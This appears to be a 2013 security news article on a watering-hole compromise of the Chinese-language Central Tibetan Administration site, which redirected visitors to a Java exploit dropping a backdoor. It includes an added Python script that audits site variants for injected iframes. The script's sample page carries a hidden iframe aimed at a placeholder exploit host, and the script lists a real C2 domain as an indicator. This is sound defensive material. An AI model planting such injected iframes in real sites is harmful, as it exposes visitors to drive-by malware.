Only the Chinese version of the site hosts the malicious code

Aug 13, 2013 07:36 GMT

Researchers warn that the Chinese-language website of the Central Tibetan Administration (CTA), the organization headed by the Dalai Lama that campaigns for restoring freedom for Tibetans, has been compromised.

According to Kaspersky, a piece of malicious code has been planted on the website to redirect visitors to a Java exploit designed to drop a backdoor.

Interestingly, the attack is aimed only at visitors of the site’s Chinese version. The English and Tibetan versions of the site don’t host the iframe that redirects visitors to the Java exploit, which drops and executes a backdoor detected as Trojan.Win32.Swisyn.cyxf.

The Java exploit leverages an older vulnerability, CVE-2012-4681, and many antivirus products detect the backdoor. However, most of them misclassify it as a variant of gaming password stealers.

The threat communicates with a command and control server located at news.worldlinking.com. This particular server has also been used for Apple-related Java exploits that target the more recent CVE-2013-2423 vulnerability.
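As an added illustration (not from Kaspersky’s report or this article), the script below shows how a site owner could audit every language variant of a site for the kind of injected, off-site iframe described above, so that an injection present in only one variant does not go unnoticed. The sample HTML, the site host and the exploit host are constructed placeholders; news.worldlinking.com is the C2 domain named in the article.

```python
from html.parser import HTMLParser
from urllib.parse import urlparse

# Constructed sample pages: three language variants of one site. Only the
# Chinese variant carries an injected hidden iframe pointing off-site.
SITE_HOST = "cta-site.example"  # placeholder for the audited site's own host
PAGES = {
    "en": "<html><body><h1>Central Tibetan Administration</h1><p>News</p></body></html>",
    "bo": "<html><body><h1>Central Tibetan Administration</h1><p>News</p></body></html>",
    "zh": ('<html><body><h1>Central Tibetan Administration</h1><p>News</p>'
           '<iframe src="http://exploit-host.example/j.html" width="0" height="0"'
           ' style="visibility:hidden"></iframe></body></html>'),
}
# Indicator taken from the article; a real deployment would load a fuller list.
KNOWN_BAD_HOSTS = {"news.worldlinking.com"}


class IframeCollector(HTMLParser):
    """Collect the attributes of every <iframe> in a page."""
    def __init__(self):
        super().__init__()
        self.iframes = []

    def handle_starttag(self, tag, attrs):
        if tag == "iframe":
            self.iframes.append({k: (v or "") for k, v in attrs})


def suspicious_iframes(html, site_host):
    """Return iframes that are off-site, visually hidden, or point at a known C2 host."""
    parser = IframeCollector()
    parser.feed(html)
    hits = []
    for a in parser.iframes:
        src = a.get("src", "")
        host = urlparse(src).hostname or site_host  # relative src stays on-site
        style = a.get("style", "").replace(" ", "").lower()
        hidden = (a.get("width") == "0" or a.get("height") == "0"
                  or "visibility:hidden" in style or "display:none" in style)
        hit = {"src": src, "host": host, "offsite": host != site_host,
               "hidden": hidden, "known_c2": host in KNOWN_BAD_HOSTS}
        if hit["offsite"] or hit["hidden"] or hit["known_c2"]:
            hits.append(hit)
    return hits


def audit_variants(pages, site_host):
    """Map each language variant to its suspicious iframes; clean variants map to []."""
    return {lang: suspicious_iframes(html, site_host) for lang, html in pages.items()}


if __name__ == "__main__":
    for lang, hits in audit_variants(PAGES, SITE_HOST).items():
        print(lang, "CLEAN" if not hits else hits)
```

Running the audit over all variants is the point: checking only the English page would have reported the site as clean.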

For the time being, a few victims of this attack have been spotted in the United States and China, but experts warn that there could be more.

At the time of writing, the CTA website is still online and still hosts the malicious code, so users are advised to avoid visiting it.

“This threat actor has been quietly operating these sorts of watering hole attacks for at least a couple of years and also the standard spearphishing campaigns against a variety of targets that include Tibetan groups,” Kaspersky Lab Expert Kurt Baumgartner noted.

Tibetan groups are often targeted by cybercriminals. Back in March, Kaspersky and AlienVault experts analyzed a different attack that leveraged an Adobe Reader vulnerability to distribute a relatively new piece of malware dubbed ItaDuke.

At the time, the attacks relied on an apparently innocent PDF document from the National Endowment for Democracy.